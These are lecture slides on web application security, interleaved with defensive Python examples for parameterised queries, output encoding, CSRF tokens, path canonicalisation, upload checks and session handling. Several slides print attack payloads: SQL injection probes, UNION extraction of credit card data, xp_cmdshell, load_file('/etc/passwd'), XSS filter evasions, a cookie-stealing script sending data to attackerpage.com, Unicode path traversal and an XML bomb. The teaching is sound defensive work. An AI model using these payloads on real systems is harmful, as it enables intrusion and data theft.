Advanced Security for Systems Engineering VO 01: Web Application Security




Advanced Security for Systems Engineering VO 01: Web Application Security
Stefan Taber, Christian Schanes
INSO Industrial Software, Institute of Computer Aided Automation, Faculty of Informatics, TU Wien

Agenda
- OWASP Top 10
- SQL Injection
- XPath Injection
- Cross Site Scripting
- Cross Site Request Forgery
- Path Traversal Attack
- File Upload Attack
- Session Management
2 / 52

Introduction
- Security for Systems Engineering covers the basics of SQL Injection, XSS and CSRF
- In this lecture we show examples of several advanced attacks on web applications, including the consequences of these attacks, and present how different attacks can work together to break applications
3 / 52

Web Applications
- World wide in use: browser apps, applications, presentations
4 / 52

OWASP Top 10 2013
1. Injection
2. Broken Authentication and Session Management
3. Cross Site Scripting (XSS)
4. Insecure Direct Object References
5. Security Misconfiguration
6. Sensitive Data Exposure
7. Missing Function Level Access Control
8. Cross Site Request Forgery (CSRF)
9. Using Components with Known Vulnerabilities
10. Unvalidated Redirects and Forwards
(See http://www.owasp.org/)
5 / 52

SQL Injection
- SQL Injection: insert SQL query data via the input data of the application and let the DBMS interpret the malicious input
- Blind SQL Injection: the attacker has no direct feedback about the data, only information about whether data is processed or not (side channel). Therefore, SQL Injection is still possible, but more effort is required to extract data from the target
6 / 52

SQL Injection: Identify Vulnerable Parameters (i)
- There are 3 main data types: number, string and date
- Identify vulnerable parameters of the type number
Request: /myecommercesite/proddetails.asp?prodid=4
Testing:
  (1) SELECT * FROM Products WHERE ProdID = 4      // ERROR
  (2) SELECT * FROM Products WHERE ProdID = 3 + 1  // OK
The parameter is vulnerable because of (2): the arithmetic expression was evaluated by the database, so the input is interpreted as SQL rather than as a value.
7 / 52

SQL Injection: Identify Vulnerable Parameters (ii)
- Identify vulnerable strings
Request: /myecommercesite/proddetails.asp?prodname=book
Testing:
  (1) SELECT * FROM Products WHERE ProdName = 'Book'       // ERROR
  (2) SELECT * FROM Products WHERE ProdName = 'B' + 'ook'  // OK
If (2) works, the parameter is vulnerable!
8 / 52

Differences in Databases
- Database identification by database behavior
- Attacks depend on specific functions

Function      MS SQL        MySQL               Access          Oracle      DB2              Postgres
Cat Strings   +             concat(" ", " ")    " "&" "         ' '||' '    " "+" "          ' '||' '
Null          Isnull()      Ifnull()            Iff(Isnull())   Ifnull()    Ifnull()         COALESCE()
Position      CHARINDEX     LOCATE()            InStr()         InStr()     InStr()          TEXTPOS()
OS            xp_cmdshell   select into         #date#          utf_file    import/export    Call
Cast          Yes           No                  No              No          Yes              Yes
(See http://www.owasp.org/)
9 / 52

Databases and Operating Systems
- Interaction with the file system
- Write files
- Read files
- Execute commands with the permissions of the database user
10 / 52

Blind SQL Injection: Read Data
- The attacker has no feedback about the data, only information about whether data is selected or not. Therefore, SQL Injection is still possible, but more effort is required to extract data from the target.
- One way to steal the data is a brute force attack: the output is only true or false
  1. Example: customer exists / does not exist
  2. admin' and password like 'a%   -> False
  3. admin' and password like 'b%   -> True
  4. admin' and password like 'ba%  -> False
  5. admin' and password like 'bk%  -> True
- Automated tools available, e.g., SqlDumper
11 / 52

UNION SELECT Injection
- UNION SELECT statements are used to combine multiple SQL statements into one single query
- Therefore, it allows the attacker to access all tables in a system
- All SELECT queries must have the same number of columns and the columns must have the same type
12 / 52

UNION SELECT Injection: Example
SELECT CCNum, CCType, CCExp, CCName FROM CreditCards WHERE AccNum=11223344 ORDER BY $order
Inject order parameter:
SELECT CCNum, CCType, CCExp, CCName FROM CreditCards WHERE AccNum=11223344 ORDER BY 1 UNION SELECT CCNum,NULL,NULL,NULL FROM CreditCards
13 / 52

Extended Stored Procedures (MS-SQL)
- MS-SQL Servers support a large number of extended stored procedures, implemented in DLLs
- Examples:
  ...
  xp_cmdshell: execute commands on OS level
  xp_servicecontrol: start/stop services
- Example: stopping the schedule service
  EXEC master..xp_servicecontrol 'stop', 'schedule'
- Example: execute ping
  '; exec master..xp_cmdshell 'ping ip-address' --
14 / 52

File Access (MySQL)
- Load local files into the database: LOAD FILE
  UNION SELECT ,,load_file('/etc/passwd');
- Write files with data from the database: SELECT INTO OUTFILE
- Attackers can write the files to folders where they have access
- Example: using the web server to get the written file
  SELECT * FROM user INTO OUTFILE '/webserver/database-dump'
15 / 52

SQL Injection: Add Database User
- MS-SQL
  exec sp_addlogin 'evil', 'passwd'
  exec sp_addsrvrolemember 'evil', 'sysadmin'
- MySQL
  INSERT INTO mysql.user (user, host, password) VALUES ('evil', 'localhost', PASSWORD('passwd'))
- Oracle
  CREATE USER evil IDENTIFIED BY passwd TEMPORARY TABLESPACE temp DEFAULT TABLESPACE users;
  GRANT CONNECT TO evil;
  GRANT RESOURCE TO evil;
16 / 52

SQL Injection: Avoiding Input Filters (i)
- Examples for tautologies
  OR 1=1
  OR now()=now()
  OR 2 BETWEEN 1 AND 3
- Using functions and encodings
  union select * from users where login = char(114,111,111,116);
17 / 52

SQL Injection: Avoiding Input Filters (ii)
- Using blanks, tabs and line breaks between keywords, e.g., UNION SELECT written with a tab or a line break instead of the blank
- Using comments
  /**/OR/**/'x'='x'
  select/**/*/**/from/**/users;
- It is difficult to create correct filters, especially self-written ones
18 / 52

SQL Injection: Prevention and Mitigation
- Input validation
- Stored procedures and prepared statements
- Principle of least privilege
- Random delays on successful and failing statement execution
19 / 52
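The prevention slide lists prepared statements and input validation without showing either. The following is an added example, not code from the lecture: it uses Python's sqlite3 with a constructed Products table (standing in for the one in the earlier slides), puts the string-concatenated query next to its parameterised form, and shows that the OR 1=1 tautology from the filter-evasion slide only works against the first. The column names and sample rows are assumptions made for the example.

```python
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the lecture's Products table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Products (ProdID INTEGER, ProdName TEXT, Price INTEGER)")
    conn.executemany("INSERT INTO Products VALUES (?, ?, ?)",
                     [(1, "Book", 10), (2, "Pen", 2), (3, "Lamp", 30), (4, "Desk", 120)])
    return conn


def find_by_name_unsafe(conn, prodname):
    # Vulnerable pattern from the slides: the request parameter is pasted into
    # the SQL text, so a quote in the input closes the string literal and
    # whatever follows is parsed as SQL.
    sql = "SELECT ProdID, ProdName FROM Products WHERE ProdName = '%s'" % prodname
    return conn.execute(sql).fetchall()


def find_by_name_safe(conn, prodname):
    # Prepared statement: the value is bound separately from the SQL text, so
    # quotes, comment markers and OR-tautologies stay inert data.
    sql = "SELECT ProdID, ProdName FROM Products WHERE ProdName = ?"
    return conn.execute(sql, (prodname,)).fetchall()


def parse_prodid(raw):
    # Whitelist validation for the numeric parameter: only digits are accepted,
    # so a probe such as "3 + 1" is rejected before any query is built.
    if not raw.isdigit():
        raise ValueError("prodid must be a positive integer: %r" % raw)
    return int(raw)


def find_by_id(conn, raw_prodid):
    # Validation and binding together: the integer is still passed as a parameter.
    sql = "SELECT ProdID, ProdName FROM Products WHERE ProdID = ?"
    return conn.execute(sql, (parse_prodid(raw_prodid),)).fetchall()


if __name__ == "__main__":
    db = make_db()
    tautology = "' OR 1=1 --"          # tautology from the filter-evasion slide
    print("unsafe:", find_by_name_unsafe(db, tautology))   # every row is returned
    print("safe:  ", find_by_name_safe(db, tautology))     # no row matches
    print("by id: ", find_by_id(db, "4"))
```

The unsafe function is kept only for comparison; in the safe variant the database never sees the input as SQL, which is why the tautology returns nothing rather than the whole table.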

XPath Injection
- Similar to SQL Injection: instead of SQL, XPath statements are used
- Often possible when XML is used as database
  //user[name='admin' and pass='secure']
- Inject: ' or ''='
  //user[name='admin' and pass='unknown' or ''='']
20 / 52
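XPath has no prepared statements in the SQL sense and XPath 1.0 string literals have no escape sequence, so the usual defence is to build a proper literal around the user value (or to pass it as a variable where the engine supports that). The following is an added example, not code from the lecture: it reproduces the slide's injected query, shows the safe literal construction, and runs the login check against a constructed user store using Python's ElementTree. ElementTree only supports a subset of XPath (no `and`, no `concat()`), which is why the check uses two chained predicates; with a full engine the expression from `build_query_safe()` would be evaluated directly.

```python
import xml.etree.ElementTree as ET

# Constructed user store standing in for the XML "database" on the slide.
USERS_XML = """<users>
  <user><name>admin</name><pass>secure</pass></user>
  <user><name>bob</name><pass>hunter2</pass></user>
</users>"""


def xpath_literal(value):
    # XPath 1.0 string literals have no escape sequence, so a value is wrapped
    # in whichever quote it does not contain; a value containing both kinds is
    # split with concat(). The user's input can then never terminate the literal.
    if "'" not in value:
        return "'%s'" % value
    if '"' not in value:
        return '"%s"' % value
    pieces = value.split("'")
    return "concat(%s)" % ", \"'\", ".join("'%s'" % p for p in pieces)


def build_query_unsafe(name, password):
    # Vulnerable construction from the slide: values pasted into the expression.
    return "//user[name='%s' and pass='%s']" % (name, password)


def build_query_safe(name, password):
    # Same query with both values turned into proper literals.
    return "//user[name=%s and pass=%s]" % (xpath_literal(name), xpath_literal(password))


def login(name, password):
    # ElementTree's XPath subset has no 'and', so the two conditions become two
    # chained predicates, each built with xpath_literal(). Returns True only
    # when a user element matches both name and password exactly.
    if ("'" in name and '"' in name) or ("'" in password and '"' in password):
        return False          # concat() is not supported by ElementTree; reject
    root = ET.fromstring(USERS_XML)
    expr = ".//user[name=%s][pass=%s]" % (xpath_literal(name), xpath_literal(password))
    return root.find(expr) is not None


if __name__ == "__main__":
    injected = "unknown' or ''='"
    print(build_query_unsafe("admin", injected))   # predicate becomes a tautology
    print(build_query_safe("admin", injected))     # input stays one string literal
    print(login("admin", "secure"), login("admin", injected))   # True False
```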

Cross Site Scripting (XSS)
- Interpretation of maliciously injected code in the browser
- Basically the user is the target, not the application
- The application is abused as the medium
- The malicious script code is loaded from a trusted site
- Starting point to execute arbitrary code controlled by the attacker on the client side
21 / 52

Cross Site Scripting: Identify Vulnerable Parameters
- Basic test for injectable fields of a web page
  URL parameter
  Any field in the page
  Headers of an HTTP message
- Test vectors
  Plain HTML: <h1>, <b>, <br/>, <img src=...>
  JavaScript: <script>...</script>, <img src="javascript:...">, <b onmouseover="...">
22 / 52

Cross Site Scripting: Examples
- Redirects
  <script>window.location.replace('http://stackoverflow.com');</script>
- Session Hijacking
  http://www.testdomain.com/default.aspx?username=<script>window.location.href='http://www.attackerpage.com/index.php?content='+document.cookie</script>
23 / 52

Cross Site Scripting: Avoiding Input Filters
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3a&#x61&#x6c&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
><STYLE>@import 'javascript:alert("XSS")';</STYLE>
>%22%27><img%20src%3d%22javascript:alert(%27%20xss%27)%22>
%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e
;! <XSS>=&{()}
(See http://www.owasp.org/)
24 / 52

MySpace Worm (Samy Worm) as Example
- Adds profile "Samy" to users
- Within one day more than 1.000.000 contact requests
- JavaScript in CSS: <div style="background:url('javascript:alert(1)')">
- Avoid filtering of "javascript" via "java\nscript"
- Avoid filtering of " via String.fromCharCode(34)
- Avoid filtering of "innerHTML" via eval('document.body.inne' + 'rHTML')
- Using XML-HTTP (AJAX) for attacking the target
(See http://namb.la/popular/tech.html)
25 / 52

Cross Site Scripting: Prevention
- Input validation
- Filter or disable JavaScript and Flash in the browser
- Content Security Policy
26 / 52
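The prevention slide names input validation and Content Security Policy; the defence that the examples two slides earlier actually call for is context-dependent output encoding, which the page does not show. The following is an added example, not code from the lecture: a reflected greeting rendered unsafely and with HTML-entity encoding, a link whose query parameter is percent-encoded before it is placed in an attribute, and a CSP header set that blocks inline and javascript: scripts. The page layout, the `/users/userdetails` path from the CSRF slide and the exact header values are assumptions.

```python
import html
import urllib.parse


def render_greeting_unsafe(username):
    # Vulnerable rendering: the request parameter lands in the page unchanged,
    # so a <script> payload in the parameter is executed by the browser.
    return "<h1>Welcome %s</h1>" % username


def render_greeting_safe(username):
    # Output encoding for the HTML body context: <, >, &, " and ' become
    # entities, so the browser displays the payload as text instead of markup.
    return "<h1>Welcome %s</h1>" % html.escape(username, quote=True)


def profile_link_safe(user_id):
    # URL inside an attribute needs two layers: percent-encode the query
    # parameter first, then HTML-escape the whole attribute value.
    query = urllib.parse.urlencode({"id": user_id})
    return '<a href="%s">Profile</a>' % html.escape("/users/userdetails?" + query, quote=True)


def security_headers():
    # Content Security Policy from the prevention slide: scripts only from this
    # origin, inline scripts and javascript: URLs blocked, so a payload that
    # slips past encoding still does not run. nosniff stops MIME-type guessing.
    return {
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
        "X-Content-Type-Options": "nosniff",
    }


if __name__ == "__main__":
    # Session-hijacking payload from the examples slide, used here as test input.
    payload = ("<script>window.location.href='http://www.attackerpage.com/"
               "index.php?content='+document.cookie</script>")
    print(render_greeting_unsafe(payload))
    print(render_greeting_safe(payload))
    print(profile_link_safe("5&token=123"))
    for name, value in security_headers().items():
        print("%s: %s" % (name, value))
```

Encoding must match the context the value ends up in (HTML body, attribute, URL, JavaScript string); the CSP is the second layer for the cases where one context was missed.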

Cross Site Request Forgery (CSRF)
- CSRF: abusing the trust of an application in the user
- The attacker sends a manipulated HTTP request to the victim application via the (authenticated) user's browser
27 / 52

CSRF: Identify Vulnerable Parameters (i)
- Identify unvalidated redirects and forwards
- Identify insecure direct object references
- Identify SQL Injection vulnerable parameters
- Identify XSS vulnerable parameters
- Img-tag injection
28 / 52

CSRF: Identify Vulnerable Parameters (ii)
- let u be the URL being tested; for example, u = http://www.example.com/action
- build a html page containing the HTTP request referencing URL u (specifying all relevant parameters; in the case of HTTP GET this is straightforward, while for a POST request you need to resort to some Javascript);
- make sure that the valid user is logged on the application;
- induce him into following the link pointing to the URL to be tested (social engineering involved if you cannot impersonate the user yourself);
- observe the result, i.e. check if the web server executed the request.
(See https://www.owasp.org/index.php/testing_for_csrf_(OTG-SESS-005))
29 / 52

CSRF with Routers/Firewalls
1. Attacker creates a manipulated web page
2. User opens the manipulated web page
3. The response of the server is returned
4. Browser directly executes the commands in the response (without user interaction)
5. Attacker has access to the internal system and can modify the system, e.g., modify the firewall configuration
30 / 52

Examples of CSRF Attacks
- Multiple CSRF attacks in DD-WRT (Remote Root Command Execution)
- Cisco Router HTTP Administration CSRF Remote Command Execution
- OpenCA Cross Site Request Forgery (CVE-2008-0556)
31 / 52

CSRF Prevention
- Input validation
- Secret information with every request (e.g., token)
- Encrypted end-to-end connection
- Good random number generator
<form>
  <input type="hidden" name="token" value="123">
  New password: <input type="password" name="new_pwd">
  <input type="submit" value="Submit">
  <a href="/users/userdetails?id=5&token=123">Cancel</a>
</form>
32 / 52
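The form on the prevention slide shows a token of "123", which illustrates the mechanism but not what makes it work: the token has to be unpredictable, bound to the user's session and compared on the server. The following is an added example, not code from the lecture: an in-memory token store that issues a fresh CSPRNG token per session, renders the slide's form with it, and rejects a password-change request whose token is missing, guessed or taken from another session. The session identifiers, the form action and the handler's return values are assumptions made for the example.

```python
import hmac
import secrets


class CsrfProtector:
    def __init__(self):
        # session id -> current anti-CSRF token (server-side store, in memory here)
        self._tokens = {}

    def issue_token(self, session_id):
        # 32 random bytes from the OS CSPRNG, URL- and attribute-safe encoding.
        token = secrets.token_urlsafe(32)
        self._tokens[session_id] = token
        return token

    def current_token(self, session_id):
        return self._tokens.get(session_id)

    def verify(self, session_id, submitted):
        # Constant-time comparison against the token bound to *this* session;
        # a token issued to another session is just as invalid as a guess.
        expected = self._tokens.get(session_id)
        if expected is None or submitted is None:
            return False
        return hmac.compare_digest(expected, submitted)

    def render_form(self, session_id):
        # Same form as on the slide, with the placeholder "123" replaced by a
        # per-session token that the attacker's page cannot know.
        token = self.issue_token(session_id)
        return ('<form method="post" action="/users/changepassword">\n'
                '  <input type="hidden" name="token" value="%s">\n'
                '  New password: <input type="password" name="new_pwd">\n'
                '  <input type="submit" value="Submit">\n'
                '</form>' % token)


def handle_change_password(protector, session_id, form):
    # form: the parsed POST fields. The token check runs before any state change.
    if not protector.verify(session_id, form.get("token")):
        return 403, "CSRF token missing or invalid"
    return 200, "password changed"


if __name__ == "__main__":
    p = CsrfProtector()
    print(p.render_form("session-of-alice"))
    good = {"token": p.current_token("session-of-alice"), "new_pwd": "x"}
    forged = {"new_pwd": "x"}                     # what a cross-site form can send
    print(handle_change_password(p, "session-of-alice", good))
    print(handle_change_password(p, "session-of-alice", forged))
```

The forged request fails because the attacker's page can make the victim's browser send cookies, but cannot read the token out of the legitimate form (same-origin policy), so it cannot include it.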

Path Traversal Attack
- Web directories are virtual directories based on the operating system
- Specific failures (Perl scripts, Unicode, ...) allow breaking out of the directory structure provided by the web server
- Allows unauthorized access to files and programs on OS level
- Attackers use this to navigate through directories and to collect information
33 / 52

Path Traversal: Identify Vulnerable Parameters
- Basic test for fields of a web page
  URL parameter
  URL path
  Headers of an HTTP message
- Test vectors
  ../../../../etc/passwd
  ../../boot.ini
  ..\..\boot.ini
34 / 52

Example of Path Traversal / Command Injection
- Path traversal using Unicode
  http://www.victim.com/scripts/..%c0%af../windows/system32/cmd.exe?/c+dir
- Decoding the Unicode characters results in:
  http://www.victim.com/scripts/../../windows/system32/cmd.exe?/c+dir
35 / 52

Path Traversal: Prevention
- Configuration hardening
- Input validation
- Principle of least privilege
36 / 52
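The Unicode example two slides earlier works because the server checked the path before decoding it. The following is an added example, not code from the lecture, of the input-validation step: decode once, join the request path to the document root, canonicalise (which resolves every `..` and symlink), and only then check that the result still lies below the root. It is run against a constructed temporary document root and the test vectors from the identification slide; the root layout and file contents are assumptions.

```python
import os
import tempfile
import urllib.parse


def resolve_under_root(web_root, requested):
    # 1. percent-decode exactly once, before any check (the slide's Unicode case
    #    relied on the check running first); 2. join to the document root;
    # 3. canonicalise, resolving "..", "." and symlinks; 4. refuse anything
    #    whose canonical form is not inside the canonical root.
    root = os.path.realpath(web_root)
    decoded = urllib.parse.unquote(requested).replace("\\", "/")
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    if os.path.commonpath([root, candidate]) != root:
        raise PermissionError("path escapes web root: %r" % requested)
    return candidate


def is_safe_path(web_root, requested):
    # Boolean form of the check, for logging or for the self-test below.
    try:
        resolve_under_root(web_root, requested)
        return True
    except PermissionError:
        return False


def serve_file(web_root, requested):
    with open(resolve_under_root(web_root, requested), "rb") as f:
        return f.read()


def demo_root():
    # Constructed document root with a single public file for the self-test.
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "logo.txt"), "w") as f:
        f.write("public file")
    return root


if __name__ == "__main__":
    root = demo_root()
    print(serve_file(root, "images/logo.txt"))
    for probe in ["../../../../etc/passwd", "../../boot.ini", "..\\..\\boot.ini",
                  "..%2f..%2fetc/passwd"]:
        print("%-28s safe=%s" % (probe, is_safe_path(root, probe)))
```

Canonicalising with `realpath` before the prefix check is what defeats the `..` vectors; a string comparison on the raw request would miss encoded, backslash and symlink variants.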

File Upload Attack
- Using file upload fields to upload malicious files
- Possible attacks
  DoS
  Command Injection
37 / 52

File Upload Attack: Identify Vulnerable Parameters
- Null-byte file
- Large files
- Wrong filetype
- XSS by filename
38 / 52

File Upload Attack: XML Bomb
- Create a high processing load with minimal data
- Allows Denial of Service attacks
<?xml version="1.0"?>
<!DOCTYPE foobar [
  <!ENTITY x0 "ESSE">
  <!ENTITY x1 "&x0;&x0;">
  <!ENTITY x2 "&x1;&x1;">
  ...
  <!ENTITY x98 "&x97;&x97;">
  <!ENTITY x99 "&x98;&x98;">
]>
<foobar>&x99;</foobar>
39 / 52

File Upload Attack: Prevention
- Limit for file size
- Break upload when file size is over limit
- Input validation
- Principle of least privilege
- Configuration hardening
- Validate filetype by magic number (like the UNIX command "file")
40 / 52
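The prevention slide and the XML bomb slide before it together describe one upload check: abort over-sized bodies while they arrive, validate the filename, decide the type by magic number rather than by the client's name or Content-Type, and never hand a document with a DTD to an XML parser. The following is an added example, not code from the lecture, implementing those checks over constructed sample data (a PNG header, a null-byte filename, and a two-level version of the slide's entity bomb). The size limit, the accepted types and the filename alphabet are assumptions.

```python
import io
import re

MAX_UPLOAD_BYTES = 1024 * 1024          # example limit (assumption): 1 MiB

# Magic numbers of the few types this endpoint accepts; the client-supplied
# name and Content-Type are never used for the type decision.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"\xff\xd8\xff": "image/jpeg",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
    b"%PDF-": "application/pdf",
}
# One path component, no null bytes, no markup, no leading dot.
SAFE_NAME = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}")


def read_limited(stream, max_bytes=MAX_UPLOAD_BYTES, chunk=8192):
    # "Break upload when file size is over limit": abort while the body is
    # still arriving instead of buffering all of it and checking afterwards.
    buf = bytearray()
    while True:
        piece = stream.read(chunk)
        if not piece:
            return bytes(buf)
        buf += piece
        if len(buf) > max_bytes:
            raise ValueError("upload exceeds %d bytes" % max_bytes)


def sniff_type(data):
    # Type by magic number, like the UNIX "file" command on the slide.
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return None


def check_upload(filename, data, max_bytes=MAX_UPLOAD_BYTES):
    # Returns (accepted, reason_or_mime). The name check covers the null-byte,
    # path and XSS-by-filename cases from the identification slide.
    if len(data) > max_bytes:
        return False, "too large"
    if SAFE_NAME.fullmatch(filename) is None:
        return False, "bad filename"
    mime = sniff_type(data)
    if mime is None:
        return False, "type not allowed"
    return True, mime


def check_xml_upload(data, max_bytes=MAX_UPLOAD_BYTES):
    # For endpoints that take XML: refuse any DTD, which the entity bomb on the
    # slide needs to declare its entities, before the document reaches a parser.
    if len(data) > max_bytes:
        return False, "too large"
    if not data.lstrip().startswith(b"<"):
        return False, "not XML"
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return False, "DTD/entity declarations not accepted"
    return True, "application/xml"


def accepts_within_limit(data, max_bytes=MAX_UPLOAD_BYTES):
    # Convenience wrapper over read_limited() for in-memory sample data.
    try:
        read_limited(io.BytesIO(data), max_bytes)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16          # constructed PNG header
    bomb = (b'<?xml version="1.0"?><!DOCTYPE foobar [<!ENTITY x0 "ESSE">'
            b'<!ENTITY x1 "&x0;&x0;">]><foobar>&x1;</foobar>')
    print(check_upload("logo.png", png))
    print(check_upload("logo.png\x00.php", png))
    print(check_upload("<script>.png", png))
    print(check_xml_upload(bomb))
    print(accepts_within_limit(b"x" * 300, max_bytes=200))
```

Rejecting the DTD outright is the simplest defence against the entity bomb; parsers that must accept DTDs need explicit expansion limits instead.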

HTTP Session Management
- HTTP is stateless
- Session management required, using cookies, hidden form fields or URL parameters
- Client-side sessions vs. server-side sessions
- Cookies: session data is part of the HTTP header (e.g., non-persistent cookies)
- URL parameter: pass session data via URL (e.g., "parameter=value", multiple values separated by &)
- Hidden form fields: hidden HTML code, detectable by source code analysis (e.g., <input type="hidden" name="name" value="value">)
41 / 52

Session ID
- Sessions store information about the actual state
  User login
  User remains logged in
- Sessions implemented by session IDs
- Takeover of existing sessions possible
  Bad quality of session IDs
  Random session IDs vs. built session IDs (username, date, ...)
  Cookies vs. encoded into the URL as parameter
  Session IDs in the referrer available for other pages
42 / 52

Identify Vulnerable Session IDs
- Entropy of session IDs
- Does a user get a new session ID after a successful login?
- Is the session destroyed after logout?
43 / 52

Session Fixation Attack (i)
44 / 52

Session Fixation Attack (ii)
1. Attacker sends request to the web server
2. Web server generates a new session and transfers the session ID
3. Attacker sends a link with the session ID to the victim
4. Victim opens the link
5. Victim logs into the web service using the supplied session ID
The attacker now has a valid session with the identity of the victim
45 / 52

Pseudo Random Number Generator (PRNG)
- Many security methods depend on the unpredictability of random numbers
  Cryptographic keys
  Session IDs
  Authentication protocols / handshake
- Security of a PRNG depends on:
  Confidentiality and randomness of the seed
  Quality of the algorithm
46 / 52

Session IDs: Protection Techniques
- Secure random number generator
- Existing libraries for session management
- New session ID after login
- Time limit for sessions
- Use security flags in session ID cookies
  HttpOnly: the cookie cannot be accessed through client-side script
  Secure: send only over HTTPS
  Expire: expiry date
- Encrypted connection (HTTPS)
47 / 52
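The session-fixation steps, the PRNG slide and the protection techniques above describe one server-side session store: IDs from a cryptographic random source, a fresh ID issued at login so that an ID handed to the victim beforehand becomes worthless, an idle timeout, destruction at logout, and a cookie carrying the HttpOnly/Secure/expiry flags. The following is an added example, not code from the lecture, that implements exactly that in memory; the timeout value, the cookie name and the injectable clock are assumptions made for the example.

```python
import secrets
import time

SESSION_TTL = 15 * 60   # example idle timeout in seconds (assumption)


class SessionStore:
    def __init__(self, now=time.time):
        self._now = now             # injectable clock so the timeout is testable
        self._sessions = {}         # session id -> {"user": ..., "last_seen": ...}

    def create(self):
        # 32 bytes from the OS CSPRNG: not derived from username, date or a
        # seeded PRNG, so the next ID cannot be predicted from previous ones.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None, "last_seen": self._now()}
        return sid

    def get(self, sid):
        # Unknown or expired IDs yield no session; live ones have their idle
        # timer refreshed.
        s = self._sessions.get(sid)
        if s is None:
            return None
        if self._now() - s["last_seen"] > SESSION_TTL:
            del self._sessions[sid]
            return None
        s["last_seen"] = self._now()
        return s

    def login(self, sid, user):
        # Session fixation defence: the pre-login ID (possibly chosen by an
        # attacker and planted in a link) is discarded and a new one is issued
        # for the authenticated session. Returns the new ID to set as cookie.
        self._sessions.pop(sid, None)
        new_sid = self.create()
        self._sessions[new_sid]["user"] = user
        return new_sid

    def logout(self, sid):
        # Destroy the server-side state, not just the client's cookie.
        self._sessions.pop(sid, None)


def session_cookie(sid, max_age=SESSION_TTL):
    # Set-Cookie header with the flags from the slide (HttpOnly, Secure, expiry);
    # SameSite=Lax is the current browser-side addition against CSRF.
    return ("Set-Cookie: SESSIONID=%s; Max-Age=%d; Path=/; Secure; HttpOnly; SameSite=Lax"
            % (sid, max_age))


if __name__ == "__main__":
    store = SessionStore()
    planted = store.create()                 # the ID an attacker would hand over
    logged_in = store.login(planted, "victim")
    print("planted ID still valid:", store.get(planted) is not None)   # False
    print("new ID bound to user:  ", store.get(logged_in)["user"])
    print(session_cookie(logged_in))
```

After `login()` the planted ID no longer exists on the server, so whoever holds it holds nothing; the new ID travels only in the flagged cookie, never in a URL where it would leak through the referrer.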

Combinations of Attacks
- Download source code using Path Traversal
- Source analysis finds a weak PRNG
- Predictable CSRF tokens
- Launch CSRF attacks
48 / 52

Input Filter
- Input validation
  Blacklist filter
  Whitelist filter
  Sanitization
- Blacklist filters based on signatures are complex, because there are so many ways to express the same thing.
49 / 52
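The slide states why signature blacklists fail but shows neither a blacklist nor a whitelist. The following is an added example, not code from the lecture, that runs a naive keyword blacklist and a per-parameter whitelist over the inputs from this lecture's own SQL Injection slides (the comment-separated SELECT, the "3 + 1" probe and the UNION in the order parameter), plus a sanitisation variant; the parameter names and alphabets are assumptions.

```python
import re

# Naive signature blacklist of the kind the slide warns about: SQL keywords
# followed by whitespace. It is here only to show where such filters fail.
BLACKLIST = re.compile(r"\b(select|union|insert|drop)\s+", re.IGNORECASE)


def blacklist_filter(value):
    # True means "accepted".
    return BLACKLIST.search(value) is None


# Whitelist per parameter: each one accepts only the shape it legitimately
# needs; everything else is rejected, whatever keyword or encoding it uses.
WHITELIST = {
    "prodid": re.compile(r"[0-9]{1,9}"),
    "prodname": re.compile(r"[A-Za-z0-9 ]{1,64}"),
    "order": re.compile(r"(CCNum|CCType|CCExp|CCName)( (ASC|DESC))?"),
}


def whitelist_filter(param, value):
    # Unknown parameters are rejected as well: no entry means no valid input.
    pattern = WHITELIST.get(param)
    return pattern is not None and pattern.fullmatch(value) is not None


def sanitize_prodname(value):
    # Sanitisation variant: keep only the allowed alphabet. Use it where
    # rejecting is not an option, and still bind the result as a parameter.
    return re.sub(r"[^A-Za-z0-9 ]", "", value)[:64]


if __name__ == "__main__":
    probes = ["select * from users", "select/**/*/**/from/**/users"]
    for p in probes:
        print("%-32s blacklist accepts=%s whitelist accepts=%s"
              % (p, blacklist_filter(p), whitelist_filter("prodname", p)))
    print(whitelist_filter("prodid", "3 + 1"), whitelist_filter("prodid", "4"))
    print(whitelist_filter("order", "1 UNION SELECT CCNum,NULL,NULL,NULL FROM CreditCards"))
    print(sanitize_prodname("B' + 'ook"))
```

The comment-separated variant passes the blacklist because the keyword is not followed by whitespace, while the whitelist rejects it for the same reason it rejects every other probe: it is not a product name.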

Summary
- Web application security required
- OWASP Top 10 vulnerabilities
- Advanced attack techniques to break web applications (SQL Injection, XSS, CSRF, XML attacks)
- Prevention and mitigation of such attacks
50 / 52

Literature/Links
- Michal Zalewski. The Tangled Web: A Guide to Securing Modern Web Applications. No Starch Press, San Francisco, CA, USA, 1st edition, 2011. ISBN 1593273886, 9781593273880
- Open Web Application Security Project, www.owasp.org
  OWASP Top 10 Project
  OWASP Testing Guide
- Web Application Security Consortium, www.webappsec.org
- RFC 2616 (HTTP 1.1)
51 / 52

Thank you!
http://security.inso.tuwien.ac.at/
INSO Industrial Software, Institute of Computer Aided Automation, Faculty of Informatics, TU Wien